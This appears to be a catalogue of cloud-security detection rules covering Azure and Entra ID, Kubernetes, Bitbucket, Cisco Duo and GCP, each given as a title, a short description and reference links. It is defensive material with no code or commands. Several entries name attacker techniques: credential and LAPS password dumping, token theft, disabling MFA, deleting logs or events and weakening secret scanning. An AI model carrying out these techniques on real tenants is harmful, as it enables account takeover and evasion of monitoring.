Azure Kubernetes Cluster Created or Deleted Detects when a Azure Kubernetes Cluster is created or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes CronJob Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/, https://kubernetes.io/docs/concepts/workloads/controllers/job/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
Azure Kubernetes Events Deleted Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
Azure Kubernetes Network Policy Change Identifies when a Azure Kubernetes network policy is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes Pods Deleted Identifies the deletion of Azure Kubernetes Pods. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml
Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes Sensitive Role Access Identifies when ClusterRoles/Roles are being modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes Secret or Config Object Access Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes Service Account Modified or Deleted Identifies when a service account is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Disabled MFA to Bypass Authentication Mechanisms Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms. https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates
Azure Network Firewall Policy Modified or Deleted Identifies when a Firewall Policy is Modified or Deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Point-to-site VPN Modified or Deleted Identifies when a Point-to-site VPN is Modified or Deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Firewall Rule Configuration Modified or Deleted Identifies when a Firewall Rule Configuration is Modified or Deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Network Security Configuration Modified or Deleted Identifies when a network security configuration is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Virtual Network Device Modified or Deleted Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure New CloudShell Created Identifies when a new cloudshell is created inside of Azure portal. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Owner Removed From Application or Service Principal Identifies when a owner is was removed from a application or service principal in Azure. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
Rare Subscription-level Operations In Azure Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml
Azure Service Principal Created Identifies when a service principal is created in Azure. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
Azure Service Principal Removed Identifies when a service principal was removed in Azure. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
Azure Subscription Permission Elevation Via ActivityLogs Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization
Azure Suppression Rule Created Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Virtual Network Modified or Deleted Identifies when a Virtual Network is modified or deleted in Azure. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure VPN Connection Modified or Deleted Identifies when a VPN connection is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
CA Policy Removed by Non Approved Actor Monitor and alert on conditional access changes where non approved actor removed CA Policy. https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
CA Policy Updated by Non Approved Actor Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value. https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
New CA Policy by Non-approved Actor Monitor and alert on conditional access changes. https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure
Bitlocker Key Retrieval Monitor and alert for Bitlocker key retrieval. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval
Account Created And Deleted Within A Close Time Frame Detects when an account was created and deleted in a short period of time. https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts
Certificate-Based Authentication Enabled Detects when certificate based authentication has been enabled in an Azure Active Directory tenant. https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f, https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/
Changes to Device Registration Policy Monitor and alert for changes to the device registration policy. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy
Guest Users Invited To Tenant By Non Approved Inviters Detects guest users being invited to tenant by non-approved inviters https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins
New Root Certificate Authority Added Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication. https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f, https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/
Users Added to Global or Device Admin Roles Monitor and alert for users added to device admin roles. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles
Application AppID Uri Configuration Changes Detects when a configuration change is made to an applications AppID URI. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed
Added Credentials to Existing Application Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials
Delegated Permissions Granted For All Users Detects when highly privileged delegated permissions are granted on behalf of all users https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
End User Consent Detects when an end user consents to an application https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent
End User Consent Blocked Detects when end user consent is blocked due to risk-based consent. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent
Added Owner To Application Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner
App Granted Microsoft Permissions Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
App Granted Privileged Delegated Or App Permissions Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
App Assigned To Azure RBAC/Microsoft Entra Role Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role
Application URI Configuration Changes Detects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes
Windows LAPS Credential Dump From Entra ID Detects when an account dumps the LAPS password from Entra ID. https://twitter.com/NathanMcNulty/status/1785051227568632263, https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/, https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487
Change to Authentication Method Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Azure Domain Federation Settings Modified Identifies when an user or application modified the federation settings on the domain. https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes
User Added To Group With CA Policy Modification Access Monitor and alert on group membership additions of groups that have CA policy modification access https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
User Removed From Group With CA Policy Modification Access Monitor and alert on group membership removal of groups that have CA policy modification access https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
Guest User Invited By Non Approved Inviters Detects when a user that doesn't have permissions to invite a guest user attempts to invite one. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor
User State Changed From Guest To Member Detects the change of user type from "Guest" to "Member" for potential elevation of privilege. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins
PIM Approvals And Deny Elevation Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
PIM Alert Setting Changes To Disabled Detects when PIM alerts are set to disabled. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
Changes To PIM Settings Detects when changes are made to PIM roles https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
User Added To Privilege Role Detects when a user is added to a privileged role. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
Bulk Deletion Changes To Privileged Account Permissions Detects when a user is removed from a privileged role. Bulk changes should be investigated. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment
Privileged Account Creation Detects when a new admin is created. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts
Azure Subscription Permission Elevation Via AuditLogs Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation
Temporary Access Pass Added To An Account Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts
User Risk and MFA Registration Policy Updated Detects changes and updates to the user risk and MFA registration policy. Attackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence. https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy, https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities
Multi Factor Authentication Disabled For User Account Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks. https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/
Password Reset By User Account Detect when a user has reset their password in Azure AD https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Anomalous Token Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Anomalous User Activity Indicates that there are anomalous patterns of behavior like suspicious changes to the directory. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Activity From Anonymous IP Address Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Anonymous IP Address Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN. https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0, https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address
Atypical Travel Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Impossible Travel Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Suspicious Inbox Forwarding Identity Protection Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Suspicious Inbox Manipulation Rules Detects suspicious rules that delete or move messages or folders are set on a user's inbox. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Azure AD Account Credential Leaked Indicates that the user's valid credentials have been leaked. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Malicious IP Address Sign-In Failure Rate Indicates sign-in from a malicious IP address based on high failure rates. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Malicious IP Address Sign-In Suspicious Indicates sign-in from a malicious IP address known to be malicious at time of sign-in. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Sign-In From Malware Infected IP Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Password Spray Activity Indicates that a password spray attack has been successfully performed. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Primary Refresh Token Access Attempt Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Suspicious Browser Activity Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Azure AD Threat Intelligence Indicates user activity that is unusual for the user or consistent with known attack patterns. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in, https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
SAML Token Issuer Anomaly Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
New Country Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Unfamiliar Sign-In Properties Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins. https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
Stale Accounts In A Privileged Role Identifies when an account hasn't signed in during the past n number of days. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role
Invalid PIM License Identifies when an organization doesn't have the proper license for PIM and is out of compliance. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance
Roles Assigned Outside PIM Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management
Roles Activation Doesn't Require MFA Identifies when a privilege role can be activated without performing mfa. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation
Roles Activated Too Frequently Identifies when the same privilege role has multiple activations by the same user. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently
Roles Are Not Being Used Identifies when a user has been assigned a privilege role and are not using that role. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles
Too Many Global Admins Identifies an event where there are there are too many accounts assigned the Global Administrator role. https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators
Account Lockout Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Successful Authentications From Countries You Do Not Operate Out Of Detect successful authentications from countries you do not operate out of. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
Increased Failed Authentications Of Any Type Detects when sign-ins increased by 10% or greater. https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins
Measurable Increase Of Successful Authentications Detects when successful sign-ins increased by 10% or greater. https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins
Authentications To Important Apps Using Single Factor Authentication Detect when authentications to important application(s) only required single-factor authentication https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
Discovery Using AzureHound Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication. https://github.com/BloodHoundAD/AzureHound
Failed Authentications From Countries You Do Not Operate Out Of Detect failed authentications from countries you do not operate out of. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
Device Registration or Join Without MFA Monitor and alert for device registration or join events where MFA was not performed. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy
Azure AD Only Single Factor Authentication Required Detect when users are authenticating without MFA being required. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
Suspicious SignIns From A Non Registered Device Detects risky authentication from a non AD registered device without MFA being required. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
Sign-ins from Non-Compliant Devices Monitor and alert for sign-ins where the device was non-compliant. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
Sign-ins by Unknown Devices Monitor and alert for Sign-ins by unknown devices from non-Trusted locations. https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
Potential MFA Bypass Using Legacy Client Authentication Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack. https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022, https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/
Application Using Device Code Authentication Flow Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows
Applications That Are Using ROPC Authentication Flow Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider. https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows
Account Disabled or Blocked for Sign in Attempts Detects when an account is disabled or blocked for sign in but tried to log in https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts
Sign-in Failure Due to Conditional Access Requirements Not Met Define a baseline threshold for failed sign-ins due to Conditional Access failures https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts
Use of Legacy Authentication Protocols Alert on when legacy authentication has been used on an account https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts
Login to Disabled Account Detect failed attempts to sign in to disabled accounts. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Multifactor Authentication Denied User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account. https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
Azure Unusual Authentication Interruption Detects when there is a interruption in the authentication process. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Multifactor Authentication Interrupted Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Users Authenticating To Other Azure AD Tenants Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants. https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins
User Access Blocked by Azure Conditional Access Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts. https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
Bitbucket Full Data Export Triggered Detects when full data export is attempted. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html
Bitbucket Global Permission Changed Detects global permissions change activity. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html
Bitbucket Global Secret Scanning Rule Deleted Detects Bitbucket global secret scanning rule deletion activity. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket Global SSH Settings Changed Detects Bitbucket global SSH access configuration changes. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html
Bitbucket Audit Log Configuration Updated Detects changes to the bitbucket audit log configuration. https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html
Bitbucket Project Secret Scanning Allowlist Added Detects when a secret scanning allowlist rule is added for projects. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket Secret Scanning Exempt Repository Added Detects when a repository is exempted from secret scanning feature. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket Secret Scanning Rule Deleted Detects when secret scanning rule is deleted for the project or repository. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket Unauthorized Access To A Resource Detects unauthorized access attempts to a resource. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
Bitbucket Unauthorized Full Data Export Triggered Detects when full data export is attempted an unauthorized user. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
Bitbucket User Details Export Attempt Detected Detects user data export activity. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts
Bitbucket User Login Failure Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
Bitbucket User Login Failure Via SSH Detects SSH user login access failures. Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field. https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html, https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html
Bitbucket User Permissions Export Attempt Detects user permission data export attempt. https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html
Cisco Duo Successful MFA Authentication Via Bypass Code Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems. https://duo.com/docs/adminapi#logs, https://help.duo.com/s/article/6327?language=en_US
GCP Access Policy Deleted Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource. https://cloud.google.com/access-context-manager/docs/audit-logging, https://cloud.google.com/logging/docs/audit/understanding-audit-logs, https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog
GCP Break-glass Container Workload Deployed Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls. https://cloud.google.com/binary-authorization
Google Cloud Storage Buckets Enumeration Detects when storage bucket is enumerated in Google Cloud. https://cloud.google.com/storage/docs/json_api/v1/buckets
Google Cloud Storage Buckets Modified or Deleted Detects when storage bucket is modified or deleted in Google Cloud. https://cloud.google.com/storage/docs/json_api/v1/buckets
Google Cloud Re-identifies Sensitive Information Identifies when sensitive information is re-identified in google Cloud. https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify
Google Cloud DNS Zone Modified or Deleted Identifies when a DNS Zone is modified or deleted in Google Cloud. https://cloud.google.com/dns/docs/reference/v1/managedZones
